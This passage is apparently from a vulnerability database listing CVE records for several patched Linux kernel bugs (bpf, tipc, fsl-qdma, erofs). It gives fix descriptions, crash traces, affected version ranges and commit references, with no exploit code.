"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.10.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.15.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: fix check for attempt to corrupt spilled pointer\n\nWhen register is spilled onto a stack as a 1/2/4-byte register, we set\nslot_type[BPF_REG_SIZE - 1] (plus potentially few more below it,\ndepending on actual spill size). So to check if some stack slot has\nspilled register we need to consult slot_type[7], not slot_type[0].\n\nTo avoid the need to remember and double-check this in the future, just\nuse is_spilled_reg() helper."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:08.112Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2757f17972d87773b3677777f5682510f13c66ef"
},
{
"url": "https://git.kernel.org/stable/c/67e6707f07354ed1acb4e65552e97c60cf9d69cf"
},
{
"url": "https://git.kernel.org/stable/c/fc3e3c50a0a4cac1463967c110686189e4a59104"
},
{
"url": "https://git.kernel.org/stable/c/8dc15b0670594543c356567a1a45b0182ec63174"
},
{
"url": "https://git.kernel.org/stable/c/40617d45ea05535105e202a8a819e388a2b1f036"
},
{
"url": "https://git.kernel.org/stable/c/ab125ed3ec1c10ccc36bc98c7a4256ad114a3dae"
}
],
"title": "bpf: fix check for attempt to corrupt spilled pointer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52462",
"datePublished": "2024-02-23T14:46:22.900Z",
"dateReserved": "2024-02-20T12:30:33.296Z",
"dateUpdated": "2025-05-04T07:37:08.112Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26663 (GCVE-0-2024-26663)
Vulnerability from cvelistv5
Published
2024-04-02 06:22
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tipc: Check the bearer type before calling tipc_udp_nl_bearer_add()
syzbot reported the following general protection fault [1]:
general protection fault, probably for non-canonical address 0xdffffc0000000010: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000080-0x0000000000000087]
...
RIP: 0010:tipc_udp_is_known_peer+0x9c/0x250 net/tipc/udp_media.c:291
...
Call Trace:
<TASK>
tipc_udp_nl_bearer_add+0x212/0x2f0 net/tipc/udp_media.c:646
tipc_nl_bearer_add+0x21e/0x360 net/tipc/bearer.c:1089
genl_family_rcv_msg_doit+0x1fc/0x2e0 net/netlink/genetlink.c:972
genl_family_rcv_msg net/netlink/genetlink.c:1052 [inline]
genl_rcv_msg+0x561/0x800 net/netlink/genetlink.c:1067
netlink_rcv_skb+0x16b/0x440 net/netlink/af_netlink.c:2544
genl_rcv+0x28/0x40 net/netlink/genetlink.c:1076
netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]
netlink_unicast+0x53b/0x810 net/netlink/af_netlink.c:1367
netlink_sendmsg+0x8b7/0xd70 net/netlink/af_netlink.c:1909
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0xd5/0x180 net/socket.c:745
____sys_sendmsg+0x6ac/0x940 net/socket.c:2584
___sys_sendmsg+0x135/0x1d0 net/socket.c:2638
__sys_sendmsg+0x117/0x1e0 net/socket.c:2667
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x40/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
The cause of this issue is that when tipc_nl_bearer_add() is called with
the TIPC_NLA_BEARER_UDP_OPTS attribute, tipc_udp_nl_bearer_add() is called
even if the bearer is not UDP.
tipc_udp_is_known_peer() called by tipc_udp_nl_bearer_add() assumes that
the media_ptr field of the tipc_bearer has an udp_bearer type object, so
the function goes crazy for non-UDP bearers.
This patch fixes the issue by checking the bearer type before calling
tipc_udp_nl_bearer_add() in tipc_nl_bearer_add().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f Version: ef20cd4dd1633987bcf46ac34ace2c8af212361f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26663",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T15:01:46.365302Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:45.519Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.929Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24ec8f0da93b8a9fba11600be8a90f0d73fb46f1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f70f0b412458c622a12d4292782c8e92e210c2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/19d7314f2fb9515bdaac9829d4d8eb34edd1fe95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1701ea85ef0ec7be6a1b36c7da69f572ed2fd12"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d3a5b31b43515b5752ff282702ca546ec3e48b6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/888e3524be87f3df9fa3c083484e4b62b3e3bb59"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0cd331dfd6023640c9669d0592bc0fd491205f87"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3871aa01e1a779d866fa9dfdd5a836f342f4eb87"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tipc/bearer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "24ec8f0da93b8a9fba11600be8a90f0d73fb46f1",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "6f70f0b412458c622a12d4292782c8e92e210c2f",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "19d7314f2fb9515bdaac9829d4d8eb34edd1fe95",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "c1701ea85ef0ec7be6a1b36c7da69f572ed2fd12",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "3d3a5b31b43515b5752ff282702ca546ec3e48b6",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "888e3524be87f3df9fa3c083484e4b62b3e3bb59",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "0cd331dfd6023640c9669d0592bc0fd491205f87",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
},
{
"lessThan": "3871aa01e1a779d866fa9dfdd5a836f342f4eb87",
"status": "affected",
"version": "ef20cd4dd1633987bcf46ac34ace2c8af212361f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tipc/bearer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: Check the bearer type before calling tipc_udp_nl_bearer_add()\n\nsyzbot reported the following general protection fault [1]:\n\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000010: 0000 [#1] PREEMPT SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000080-0x0000000000000087]\n...\nRIP: 0010:tipc_udp_is_known_peer+0x9c/0x250 net/tipc/udp_media.c:291\n...\nCall Trace:\n \u003cTASK\u003e\n tipc_udp_nl_bearer_add+0x212/0x2f0 net/tipc/udp_media.c:646\n tipc_nl_bearer_add+0x21e/0x360 net/tipc/bearer.c:1089\n genl_family_rcv_msg_doit+0x1fc/0x2e0 net/netlink/genetlink.c:972\n genl_family_rcv_msg net/netlink/genetlink.c:1052 [inline]\n genl_rcv_msg+0x561/0x800 net/netlink/genetlink.c:1067\n netlink_rcv_skb+0x16b/0x440 net/netlink/af_netlink.c:2544\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1076\n netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]\n netlink_unicast+0x53b/0x810 net/netlink/af_netlink.c:1367\n netlink_sendmsg+0x8b7/0xd70 net/netlink/af_netlink.c:1909\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0xd5/0x180 net/socket.c:745\n ____sys_sendmsg+0x6ac/0x940 net/socket.c:2584\n ___sys_sendmsg+0x135/0x1d0 net/socket.c:2638\n __sys_sendmsg+0x117/0x1e0 net/socket.c:2667\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x40/0x110 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nThe cause of this issue is that when tipc_nl_bearer_add() is called with\nthe TIPC_NLA_BEARER_UDP_OPTS attribute, tipc_udp_nl_bearer_add() is called\neven if the bearer is not UDP.\n\ntipc_udp_is_known_peer() called by tipc_udp_nl_bearer_add() assumes that\nthe media_ptr field of the tipc_bearer has an udp_bearer type object, so\nthe function goes crazy for non-UDP bearers.\n\nThis patch fixes the issue by checking the bearer type before calling\ntipc_udp_nl_bearer_add() in tipc_nl_bearer_add()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:24.984Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/24ec8f0da93b8a9fba11600be8a90f0d73fb46f1"
},
{
"url": "https://git.kernel.org/stable/c/6f70f0b412458c622a12d4292782c8e92e210c2f"
},
{
"url": "https://git.kernel.org/stable/c/19d7314f2fb9515bdaac9829d4d8eb34edd1fe95"
},
{
"url": "https://git.kernel.org/stable/c/c1701ea85ef0ec7be6a1b36c7da69f572ed2fd12"
},
{
"url": "https://git.kernel.org/stable/c/3d3a5b31b43515b5752ff282702ca546ec3e48b6"
},
{
"url": "https://git.kernel.org/stable/c/888e3524be87f3df9fa3c083484e4b62b3e3bb59"
},
{
"url": "https://git.kernel.org/stable/c/0cd331dfd6023640c9669d0592bc0fd491205f87"
},
{
"url": "https://git.kernel.org/stable/c/3871aa01e1a779d866fa9dfdd5a836f342f4eb87"
}
],
"title": "tipc: Check the bearer type before calling tipc_udp_nl_bearer_add()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26663",
"datePublished": "2024-04-02T06:22:12.537Z",
"dateReserved": "2024-02-19T14:20:24.148Z",
"dateUpdated": "2025-05-04T08:53:24.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26788 (GCVE-0-2024-26788)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: fsl-qdma: init irq after reg initialization
Initialize the qDMA irqs after the registers are configured so that
interrupts that may have been pending from a primary kernel don't get
processed by the irq handler before it is ready to and cause panic with
the following trace:
Call trace:
fsl_qdma_queue_handler+0xf8/0x3e8
__handle_irq_event_percpu+0x78/0x2b0
handle_irq_event_percpu+0x1c/0x68
handle_irq_event+0x44/0x78
handle_fasteoi_irq+0xc8/0x178
generic_handle_irq+0x24/0x38
__handle_domain_irq+0x90/0x100
gic_handle_irq+0x5c/0xb8
el1_irq+0xb8/0x180
_raw_spin_unlock_irqrestore+0x14/0x40
__setup_irq+0x4bc/0x798
request_threaded_irq+0xd8/0x190
devm_request_threaded_irq+0x74/0xe8
fsl_qdma_probe+0x4d4/0xca8
platform_drv_probe+0x50/0xa0
really_probe+0xe0/0x3f8
driver_probe_device+0x64/0x130
device_driver_attach+0x6c/0x78
__driver_attach+0xbc/0x158
bus_for_each_dev+0x5c/0x98
driver_attach+0x20/0x28
bus_add_driver+0x158/0x220
driver_register+0x60/0x110
__platform_driver_register+0x44/0x50
fsl_qdma_driver_init+0x18/0x20
do_one_initcall+0x48/0x258
kernel_init_freeable+0x1a4/0x23c
kernel_init+0x10/0xf8
ret_from_fork+0x10/0x18
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26788",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:30:20.690408Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:46.809Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.469Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cc5fb824c2125aa3740d905b3e5b378c8a09478"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9579a21e99fe8dab22a253050ddff28d340d74e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4529c084a320be78ff2c5e64297ae998c6fdf66b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/474d521da890b3e3585335fb80a6044cb2553d99"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a69c8bbb946936ac4eb6a6ae1e849435aa8d947d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/677102a930643c31f1b4c512b041407058bdfef8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87a39071e0b639f45e05d296cc0538eef44ec0bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/fsl-qdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3cc5fb824c2125aa3740d905b3e5b378c8a09478",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "9579a21e99fe8dab22a253050ddff28d340d74e1",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "4529c084a320be78ff2c5e64297ae998c6fdf66b",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "474d521da890b3e3585335fb80a6044cb2553d99",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "a69c8bbb946936ac4eb6a6ae1e849435aa8d947d",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "677102a930643c31f1b4c512b041407058bdfef8",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "87a39071e0b639f45e05d296cc0538eef44ec0bd",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/fsl-qdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: fsl-qdma: init irq after reg initialization\n\nInitialize the qDMA irqs after the registers are configured so that\ninterrupts that may have been pending from a primary kernel don\u0027t get\nprocessed by the irq handler before it is ready to and cause panic with\nthe following trace:\n\n Call trace:\n fsl_qdma_queue_handler+0xf8/0x3e8\n __handle_irq_event_percpu+0x78/0x2b0\n handle_irq_event_percpu+0x1c/0x68\n handle_irq_event+0x44/0x78\n handle_fasteoi_irq+0xc8/0x178\n generic_handle_irq+0x24/0x38\n __handle_domain_irq+0x90/0x100\n gic_handle_irq+0x5c/0xb8\n el1_irq+0xb8/0x180\n _raw_spin_unlock_irqrestore+0x14/0x40\n __setup_irq+0x4bc/0x798\n request_threaded_irq+0xd8/0x190\n devm_request_threaded_irq+0x74/0xe8\n fsl_qdma_probe+0x4d4/0xca8\n platform_drv_probe+0x50/0xa0\n really_probe+0xe0/0x3f8\n driver_probe_device+0x64/0x130\n device_driver_attach+0x6c/0x78\n __driver_attach+0xbc/0x158\n bus_for_each_dev+0x5c/0x98\n driver_attach+0x20/0x28\n bus_add_driver+0x158/0x220\n driver_register+0x60/0x110\n __platform_driver_register+0x44/0x50\n fsl_qdma_driver_init+0x18/0x20\n do_one_initcall+0x48/0x258\n kernel_init_freeable+0x1a4/0x23c\n kernel_init+0x10/0xf8\n ret_from_fork+0x10/0x18"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:32.671Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3cc5fb824c2125aa3740d905b3e5b378c8a09478"
},
{
"url": "https://git.kernel.org/stable/c/9579a21e99fe8dab22a253050ddff28d340d74e1"
},
{
"url": "https://git.kernel.org/stable/c/4529c084a320be78ff2c5e64297ae998c6fdf66b"
},
{
"url": "https://git.kernel.org/stable/c/474d521da890b3e3585335fb80a6044cb2553d99"
},
{
"url": "https://git.kernel.org/stable/c/a69c8bbb946936ac4eb6a6ae1e849435aa8d947d"
},
{
"url": "https://git.kernel.org/stable/c/677102a930643c31f1b4c512b041407058bdfef8"
},
{
"url": "https://git.kernel.org/stable/c/87a39071e0b639f45e05d296cc0538eef44ec0bd"
}
],
"title": "dmaengine: fsl-qdma: init irq after reg initialization",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26788",
"datePublished": "2024-04-04T08:20:20.410Z",
"dateReserved": "2024-02-19T14:20:24.178Z",
"dateUpdated": "2025-05-04T08:56:32.671Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52497 (GCVE-0-2023-52497)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:38
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
erofs: fix lz4 inplace decompression
Currently EROFS can map another compressed buffer for inplace
decompression, that was used to handle the cases that some pages of
compressed data are actually not in-place I/O.
However, like most simple LZ77 algorithms, LZ4 expects the compressed
data is arranged at the end of the decompressed buffer and it
explicitly uses memmove() to handle overlapping:
__________________________________________________________
|_ direction of decompression --> ____ |_ compressed data _|
Although EROFS arranges compressed data like this, it typically maps two
individual virtual buffers so the relative order is uncertain.
Previously, it was hardly observed since LZ4 only uses memmove() for
short overlapped literals and x86/arm64 memmove implementations seem to
completely cover it up and they don't have this issue. Juhyung reported
that EROFS data corruption can be found on a new Intel x86 processor.
After some analysis, it seems that recent x86 processors with the new
FSRM feature expose this issue with "rep movsb".
Let's strictly use the decompressed buffer for lz4 inplace
decompression for now. Later, as an useful improvement, we could try
to tie up these two buffers together in the correct order.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 Version: 0ffd71bcc3a03ebb3551661a36052488369c4de9 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52497",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-07T16:13:41.821063Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:41.074Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.612Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
